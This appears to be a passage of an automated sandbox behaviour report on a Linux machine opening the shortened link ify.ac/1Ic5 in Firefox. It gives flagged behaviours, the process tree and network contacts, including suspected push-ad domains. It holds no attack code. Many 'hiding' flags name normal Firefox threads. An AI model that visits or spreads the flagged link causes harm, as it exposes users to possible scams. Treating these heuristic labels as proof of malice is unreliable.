| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | JS Watchdog | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BGReadURLs | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | glxtest:disk$0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cache2 I/O | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Cookie | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | StreamTrans #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | TaskCon~ller #0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Worker Launcher | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | BgIOThr~Pool #1 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Softwar~cThread | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | CanvasRenderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Compositor | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorkerLP#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | WRWorker#0 | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Renderer | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | ImageIO | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Permission | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Permission | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | IPC Launch | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | SandboxReporter | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | SandboxReporter | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Breakpad Server | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Sandbox Forked | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | Chroot Helper | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gmain | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | pool-/usr/libex | N/A | N/A |
| Changes the process name, possibly in an attempt to hide itself | gdbus | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/lib/firefox/firefox | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /usr/bin/nautilus | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index3/size | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/cpu0/cache/index2/size | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu/present | /usr/lib/firefox/firefox | N/A |
Enumerates kernel/hardware configuration
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/subsystem_vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/subsystem_device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/class | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:02.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:02.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.1/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:06.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:04.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/class | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-1/1-1:1.0/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.0/irq | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:00.0/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:03.0/device | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:05.0/class | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/devices/pci0000:00/0000:00:05.0/usb1/1-0:1.0/uevent | /usr/libexec/gvfs-gphoto2-volume-monitor | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/resource | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/bus/pci/devices/0000:00:01.3/vendor | /usr/lib/firefox/glxtest | N/A |
| File opened for reading | /sys/fs/cgroup/cpu,cpuacct/cpu.cfs_quota_us | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/devices/system/cpu | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /sys/kernel/security/apparmor/features/dbus/mask | /usr/bin/dbus-daemon | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/fd/127 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1761/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfs-goa-volume-monitor | N/A |
| File opened for reading | /proc/1595/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/task/1596/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/100 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1626/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1788/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1605/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd/95 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1492/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfsd-trash | N/A |
| File opened for reading | /proc/self/fd/128 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/129 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/1429/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/fd | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1795/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1408/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/mountinfo | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/123 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfs-mtp-volume-monitor | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/1581/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1777/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/1575/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/task/1659/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/xdg-document-portal | N/A |
| File opened for reading | /proc/1799/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/132 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/maps | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/sys/kernel/cap_last_cap | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/libexec/gvfsd-fuse | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/89 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/126 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/sed | N/A |
| File opened for reading | /proc/self/fd/32 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/35 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1585/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/gnome-keyring-daemon | N/A |
| File opened for reading | /proc/1771/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/stat | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/12 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/self/fd/131 | /usr/lib/firefox/firefox | N/A |
| File opened for reading | /proc/1492/root | /usr/libexec/xdg-desktop-portal | N/A |
| File opened for reading | /proc/1771/cgroup | /usr/libexec/gvfs-udisks2-volume-monitor | N/A |
| File opened for reading | /proc/1783/cmdline | /usr/bin/dbus-daemon | N/A |
| File opened for reading | /proc/self/cgroup | /usr/lib/firefox/firefox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/firefox/.parentlock | /usr/lib/firefox/firefox | N/A |
| File opened for modification | /tmp/tmpaddon | /usr/lib/firefox/firefox | N/A |
Processes
/usr/bin/xdg-open
[xdg-open https://ify.ac/1Ic5]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-daemon
[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/grep
[grep -q ^file://]
/usr/bin/egrep
[egrep -q ^[[:alpha:]+\.\-]+:]
/usr/local/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/local/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/sbin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/grep
[grep -E -q ^[[:alpha:]+\.\-]+:]
/usr/bin/sed
[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]
/usr/bin/xdg-mime
[xdg-mime query default x-scheme-handler/https]
/usr/bin/dbus-send
[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]
/usr/bin/dbus-launch
[dbus-launch --autolaunch 4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/grep
[grep = \"xfce4\"$]
/usr/bin/xprop
[xprop -root _DT_SAVE_MODE]
/usr/bin/grep
[grep -i ^xfce_desktop_window]
/usr/bin/xprop
[xprop -root]
/usr/bin/grep
[grep -q ^Enlightenment]
/usr/bin/uname
[uname]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]
/usr/bin/cut
[cut -d ; -f 1]
/usr/bin/cut
[cut -d = -f 2]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]
/usr/bin/sed
[sed s/:/ /g]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/sed
[sed -e s|-|/|]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/which
[which firefox]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/cut
[cut -d= -f 2-]
/usr/bin/firefox
[/usr/bin/firefox https://ify.ac/1Ic5]
/usr/bin/which
[which /usr/bin/firefox]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox https://ify.ac/1Ic5]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/lib/firefox/glxtest
[/usr/lib/firefox/glxtest -f 13]
/usr/bin/lsb_release
[/usr/bin/lsb_release -idrc]
/usr/local/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/local/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/sbin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/bin/dbus-launch
[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]
/usr/libexec/xdg-desktop-portal
[/usr/libexec/xdg-desktop-portal]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -prefsLen 20982 -prefMapSize 234904 -appDir /usr/lib/firefox/browser {2ef1eef8-36be-4693-b040-b9991d309853} 1492 true socket]
/usr/libexec/xdg-document-portal
[/usr/libexec/xdg-document-portal]
/usr/libexec/xdg-permission-store
[/usr/libexec/xdg-permission-store]
/usr/libexec/xdg-desktop-portal-gtk
[/usr/libexec/xdg-desktop-portal-gtk]
/usr/libexec/gvfsd
[/usr/libexec/gvfsd]
/usr/libexec/gvfsd-fuse
[/usr/libexec/gvfsd-fuse /root/.cache/gvfs -f -o big_writes]
/usr/libexec/dconf-service
[/usr/libexec/dconf-service]
/usr/bin/nautilus
[/usr/bin/nautilus --gapplication-service]
/usr/libexec/gvfsd-trash
[/usr/libexec/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 20185 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {65da9186-591a-462b-a64e-d5f018742534} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 26849 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {ada7d652-6801-4c20-9f62-affdad637cb3} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 25603 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {202f1efe-e0d7-449c-93b8-7c26f9416083} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -sandboxingKind 0 -prefsLen 27460 -prefMapSize 234904 -appDir /usr/lib/firefox/browser {e36fab77-0d00-4969-90ec-6a5eafb26495} 1492 true utility]
/usr/bin/gnome-keyring-daemon
[/usr/bin/gnome-keyring-daemon --start --foreground --components=secrets]
/usr/libexec/gvfs-udisks2-volume-monitor
[/usr/libexec/gvfs-udisks2-volume-monitor]
/usr/libexec/gvfs-afc-volume-monitor
[/usr/libexec/gvfs-afc-volume-monitor]
/usr/libexec/gvfs-mtp-volume-monitor
[/usr/libexec/gvfs-mtp-volume-monitor]
/usr/libexec/gvfs-gphoto2-volume-monitor
[/usr/libexec/gvfs-gphoto2-volume-monitor]
/usr/libexec/gvfs-goa-volume-monitor
[/usr/libexec/gvfs-goa-volume-monitor]
/usr/libexec/goa-daemon
[/usr/libexec/goa-daemon]
/usr/libexec/goa-identity-service
[/usr/libexec/goa-identity-service]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 4 -isForBrowser -prefsLen 28871 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {5e60adea-b39d-488c-87ea-a269e201eae4} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {80c575f7-3694-47ab-bc62-65b6b2277e45} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 6 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {a973fb53-a5ad-474e-998c-6daf87bf8e38} 1492 true tab]
/usr/lib/firefox/firefox
[/usr/lib/firefox/firefox -contentproc -childID 7 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {fc3e9f66-17a6-4845-9f5a-a2c27633dbfd} 1492 true tab]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | firefox.settings.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 104.21.23.148:443 | ify.ac | tcp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | tcp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 1.1.1.1:53 | contile.services.mozilla.com | udp |
| US | 104.21.23.148:443 | ify.ac | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | tcp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 1.1.1.1:53 | oasqi.nxt-psh.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 1.1.1.1:53 | mc.yandex.ru | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | tcp |
| RU | 77.88.21.119:443 | mc.yandex.ru | tcp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 1.1.1.1:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 172.67.194.119:443 | oasqi.nxt-psh.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | nxt-psh.com | udp |
| US | 104.21.20.211:443 | nxt-psh.com | tcp |
| US | 104.21.20.211:443 | nxt-psh.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| US | 1.1.1.1:53 | mc.yandex.com | udp |
| RU | 93.158.134.119:443 | mc.yandex.com | tcp |
| US | 1.1.1.1:53 | ify.ac | udp |
| US | 1.1.1.1:53 | shavar.services.mozilla.com | udp |
